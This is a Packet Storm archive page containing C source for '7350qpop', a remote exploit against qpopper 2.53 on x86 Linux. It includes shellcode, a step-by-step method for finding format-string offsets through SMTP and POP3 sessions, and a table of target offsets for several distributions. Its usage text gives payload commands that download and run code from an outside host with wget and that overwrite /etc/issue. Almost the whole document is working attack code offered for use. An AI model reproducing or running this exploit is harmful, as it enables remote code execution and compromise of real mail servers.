qpopper 2.53 euidl x86/linux remote exploit. Includes a procedure to abuse format strings to find the correct offset. Tested on Debian 2.1, RedHat 6.1, Slackware 7, Suse 5.2 and 6.0.
d4fbf6b568b41b3a4ab5332d446981b085dcf13b1b623c727517903de3998105/* qpopper 2.53 euidl x86/linux remote exploit
*
* public version released 2000/07/15
*
* 2000/05/30
* -scut/teso.
*
* discovered and first exploited by portal,
* further information by prizm and csh.
*
* greets to team teso, security.is, thc, adm, w00w00, hert
* special thanks to portal and csh for pointing some things out
*
* supply me with offsets (see below)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <string.h>
#define SC_LEN 109 /* first shellcode length */
#define D_PAD 1897 /* %-...d padding to expand the buffer */
#define BODY_NOP_COUNT 8000
#define BODY_LENGTH 8192
/* 44 byte "read (3, <behind-me>, 8192)" x86/linux pic shellcode
* without 0x0a, 0x41-0x5b, 0x80-0x9f -sc.
* first smack
*
* it basically reads 8192 bytes behind itself and then jumps
* 120 bytes ahead into hopefully nop-space :-)
*/
unsigned char shellcode[] =
"\xeb\x22\x5f\x31\xc0\xf9\x11\xc7\xf9\xc0\xd8\x01"
"\x31\xc9\x01\xf9\xaa\x31\xdb\xb3\x03\x31\xc0\xb0"
"\x03\x01\xc1\x31\xd2\xf9\x66\xc1\xda\x03\xeb\x05"
"\xe8\xd9\xff\xff\xff\xcd\x5f\xeb\x78";
/* 38 byte x86/linux PIC arbitrary execute shellcode - scut / teso
* second smack, read from message body
*/
unsigned char ex_shellcode[] =
"\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
"\xff\xff";
static int sc_build (unsigned char *target, size_t target_len,
unsigned char *shellcode, char **argv);
void hexdump (unsigned char *cbegin, unsigned char *cend);
void sc_verify (unsigned char *sc, size_t length);
typedef struct {
char * name;
unsigned long int ret_addr;
unsigned long int pop_pointer;
} target_t;
/* HOWTO get the offsets
*
* to aquire the offsets for an unknown version of QPOP 2.53 you have to have
* a POP-able account on the target system.
*
* do as follows:
*
* telnet smtp-server-for-target.target.com 25
*
* 220 smtp-server-for-target.target.com ready.
* MAIL FROM: <>
* 250 <<>> ... Sender Okay
* RCPT TO: <targetuser@target.com>
* 250 <targetuser@target.com> ... Recipient Okay
* DATA
* 354 Enter mail, end with "." on a line by itself
* Subject: footest
* From: %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
* .
* 250 Mail accepted
* QUIT
* 221 smtp-server-for-target.target.com closing connection
*
* now login via POP3:
*
* telnet pop.target.com 110
*
* +OK QPOP (version 2.53) at pop.target.com starting.
* USER targetuser
* +OK Password required for targetuser.
* PASS passbla
* +OK targetuser has 1 messages (1141 octets).
* EUIDL 1
* +OK 2 54a955db49a7de403d100a67618fee20 455 bfffd3c0.080505f1.bfffd3c0.000001c7.08052306.bfffdbd8.08054b6c.080518d4.
*
* ^^^^^^^^
* this is the POP pointer.
* the return address is POP pointer minus 0x08b0
*
* pop_pointer = 0xbfffdbd8 - 0x08b0 = 0xbfffd328
*
* The pop pointer has to be exact, if it hits one of the forbidden characters
* (0x0a, 0x41-0x5b, 0x80-0x9f) you're out of luck. The return address can be
* modified in a window of about 50 bytes, this is enough.
*
* please mail the following data to scut@nb.in-berlin.de in case you get
* it working on some default distribution:
*
* - exact distribution version
* - ls -l /usr/sbin/popper output (or wherever your popper binary lies)
* - file /usr/sbin/popper output
* - first seven stack variables (as in output below)
* - the following output: (echo VERSION;sleep 2)|telnet localhost 113
* (in case you have a default identd installed)
*
* thank you very much, mail the whole stuff to scut@nb.in-berlin.de, i'll send
* you a copy with all known offsets back.
*/
target_t targets[] = {
/* -rwxrwxr-x 1 scut scut 39356 May 30 00:06 /tmp/popper */
/* 0x08054970.0xbfffdbd8.0x08051a1c.0x080496d0.0x00000005.0xbfffdbd8.0xbfffd7d8 */
{ "Debian 2.1 source compilation", 0xbfffd328, 0xbfffdbd8 },
/* -rwxr-xr-x 1 root root 38276 Jul 18 1998 /usr/sbin/in.qpopper */
/* /usr/sbin/in.qpopper: ELF 32-bit LSB executable, Intel 80386, version 1,
* dynamically linked (uses shared libs), stripped */
/* 0xbfffd410.0x0805042e.0xbfffd410.0x0000020a.0x080521e2.0xbfffdc28.0x080541c8 */
{ "RedHat 6.1 RPM: qpopper-2.53-1-PAM", 0xbfffd378, 0xbfffdc28 },
/* -rwxr-xr-x 1 root root 37776 Jun 1 13:17 /usr/sbin/popper */
/* 0xbfffd3b0.0x0804fc91.0xbfffd3b0.0x0000017d.0x08051986.0xbfffdbc8.0x080542c8 */
{ "Slackware 7 default binary", 0xbfffd318, 0xbfffdbc8 },
/* 0xbfffefbc.0x0804f7be.0xbfffefbc.0x000001ca.0xbfffeba2.0xbffff7d4.0x0805245c */
{ "SuSE 5.2 default binary", 0xbfffe2f2, 0xbfffeba2 },
/* -rwxr-xr-x 1 root root 39700 Dec 11 1998 /usr/sbin/popper */
/* /usr/sbin/popper: ELF 32-bit LSB executable, Intel 80386, version 1,
* dynamically linked (uses shared libs), stripped */
/* 0xbfffd3c0.0x080505f1.0xbfffd3c0.0x000001ad.0x08052306.0xbfffdbd8.0x08054b6c */
{ "SuSE 6.0 default binary", 0xbfffd328, 0xbfffdbd8 },
{ NULL, 0, 0 },
};
static int
sc_build (unsigned char *target, size_t target_len, unsigned char *shellcode,
char **argv)
{
int i;
size_t tl_orig = target_len;
if (strlen (shellcode) >= (target_len - 1))
return (-1);
memcpy (target, shellcode, strlen (shellcode));
target += strlen (shellcode);
target_len -= strlen (shellcode);
for (i = 0 ; argv[i] != NULL ; ++i)
;
/* set argument count
*/
target[0] = (unsigned char) i;
target++;
target_len--;
for ( ; i > 0 ; ) {
i -= 1;
if (strlen (argv[i]) >= target_len)
return (-1);
printf ("[%3d/%3d] adding (%2d): %s\n",
(tl_orig - target_len), tl_orig,
strlen (argv[i]), argv[i]);
memcpy (target, argv[i], strlen (argv[i]));
target += strlen (argv[i]);
target_len -= strlen (argv[i]);
target[0] = (unsigned char) (i + 1);
target++;
target_len -= 1;
}
return (tl_orig - target_len);
}
void
hexdump (unsigned char *cbegin, unsigned char *cend)
{
int i;
unsigned char * buf = cbegin;
printf ("/* %d byte shellcode */\n", cend - cbegin);
printf ("\"");
for (i = 0 ; buf < cend; ++buf) {
printf ("\\x%02x", *buf & 0xff);
if (++i >= 12) {
i = 0;
printf ("\"\n\"");
}
}
printf ("\";\n\n");
}
void
sc_verify (unsigned char *sc, size_t length)
{
int n,
bc = 0;
for (n = length - 1 ; n >= 0 ; --n) {
if (isupper (sc[n])) {
printf ("upper char '%c' (%02x) at sc[%d]\n",
sc[n], sc[n], n);
bc += 1;
} else if (sc[n] == '\x0a') {
printf ("carriage return \\x0a at sc[%d]\n", n);
bc += 1;
} else if (sc[n] >= (unsigned char) '\x80' && sc[n] <= (unsigned char) '\x9f') {
printf ("sendmail filtered character '\\x%02x' at sc[%d], won't survive sendmail\n",
sc[n], n);
} else if (n != 0 && n != 2 && sc[n] == '%') {
printf ("%% character may cause trouble at sc[%d]\n", n);
}
}
if (bc > 0) {
printf ("%d invalid %s, aborting...\n",
bc, (bc == 1) ? "character" : "characters");
exit (EXIT_FAILURE);
}
}
int
main (int argc, char *argv[])
{
int n,
i;
unsigned int target_num;
target_t * target;
unsigned char mbuf[64];
unsigned char tbuf[129];
unsigned char xpbuf[129];
unsigned char body[BODY_LENGTH];
unsigned char * xbp = xpbuf;
unsigned long int retaddr;
unsigned long int poppointer;
printf ("7350qpop - qpopper 2.53 x86/linux remote\n");
printf ("-scut / teso.\n\n");
if (argc < 5) {
printf ("usage: %s <target> <source-email> <target-email> commands ...\n\n",
argv[0]);
printf ("target target system type\n");
printf ("source-email sender email address (has to get accepted)\n");
printf ("target-email email user that will POP-get the email\n");
printf ("commands commands to run on the remote host,\n");
printf (" example: /bin/sh -c \"wget 1.1.1.1/a;chmod +x a;./a\"\n\n");
printf ("example:\n\n"
"%s 1 foo@foobar.com user@example.com \\\n"
" /bin/sh -c \"echo owned>/etc/issue\" 2>&1 >/dev/null | nc example.com 25\n\n",
argv[0]);
printf ("the standard output is for the user, the error output contains the smtp-\n"
"output to send to the mail server.\n\n");
printf ("targets:\n");
for (n = 0 ; targets[n].name != NULL ; ++n) {
printf ("%8d : %40s : 0x%08x : 0x%08x\n",
n, targets[n].name, (unsigned int) targets[n].ret_addr,
(unsigned int) targets[n].pop_pointer);
}
printf ("\nsee the source file to see the method to get the offsets.\n\n");
exit (EXIT_FAILURE);
}
if (sscanf (argv[1], "%u", &target_num) != 1) {
printf ("target specification invalid\n");
exit (EXIT_FAILURE);
}
for (n = 0 ; targets[n].name != NULL && n < target_num ; ++n)
;
if (targets[n].name == NULL) {
printf ("target number out of range\n");
exit (EXIT_FAILURE);
}
target = &targets[n];
retaddr = target->ret_addr;
poppointer = target->pop_pointer;
/* construct first read() shellcode
*/
memset (tbuf, '\x00', sizeof (tbuf));
printf ("constructing first shellcode...\n\n");
memcpy (tbuf, shellcode, strlen (shellcode));
n = strlen (shellcode);
printf ("shellcode size: %d bytes\n\n", n);
hexdump (tbuf, tbuf + n);
memset (mbuf, '\x00', sizeof (mbuf));
sprintf (mbuf, "%%-%dd", D_PAD);
sprintf (xbp, "<>%s", mbuf);
xbp += strlen (xbp);
for (n = 0 ; n < SC_LEN ; ++n) {
xbp[0] = '\x5f'; /* nops0r replac0r (das) */
xbp++;
}
xbp -= strlen (tbuf);
strcpy (xbp, tbuf);
xbp += strlen (xbp);
printf ("using\n");
printf (" retaddr : 0x%08x\n", (unsigned int) retaddr);
printf (" (POP *) p : 0x%08x\n\n", (unsigned int) poppointer);
/* _[ra]_[p]
*/
xbp[0] = (retaddr ) & 0xff;
xbp[1] = (retaddr >> 8) & 0xff;
xbp[2] = (retaddr >> 16) & 0xff;
xbp[3] = (retaddr >> 24) & 0xff;
xbp += 4;
/* [ra]_[p]_
*/
xbp[0] = (poppointer ) & 0xff;
xbp[1] = (poppointer >> 8) & 0xff;
xbp[2] = (poppointer >> 16) & 0xff;
xbp[3] = (poppointer >> 24) & 0xff;
xbp += 4;
xbp[0] = '\x00';
printf ("strlen (xpbuf) = %d\n", strlen (xpbuf));
hexdump (xpbuf, xpbuf + strlen (xpbuf));
sc_verify (xpbuf, strlen (xpbuf));
printf ("shellcode passed verification, ready for delivery.\n");
fprintf (stderr, "EHLO foobar.com\n");
fprintf (stderr, "MAIL FROM: <%s>\n", argv[2]);
fprintf (stderr, "RCPT TO: <%s>\n", argv[3]);
fprintf (stderr, "DATA\n");
fprintf (stderr, "Subject: Hello\n");
fprintf (stderr, "From: %s\n\n", xpbuf);
/* insert real shellcode
*/
for (n = 0 ; n < BODY_NOP_COUNT ; ++n)
body[n] = '\x90';
/* extra reliability armor (tm) to avoid line breakage
*/
for (i = 0 ; i < (n - 132) ; i += 128) {
body[i] = '\xeb';
body[i+1] = '\x08';
body[i+2] = '\x0a';
}
sc_build (&body[n], BODY_LENGTH - BODY_NOP_COUNT - 1, ex_shellcode,
&argv[4]);
body[BODY_LENGTH - 1] = '\x00';
fprintf (stderr, "%s\n", body);
fprintf (stderr, "\n.\nQUIT\n");
exit (EXIT_SUCCESS);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed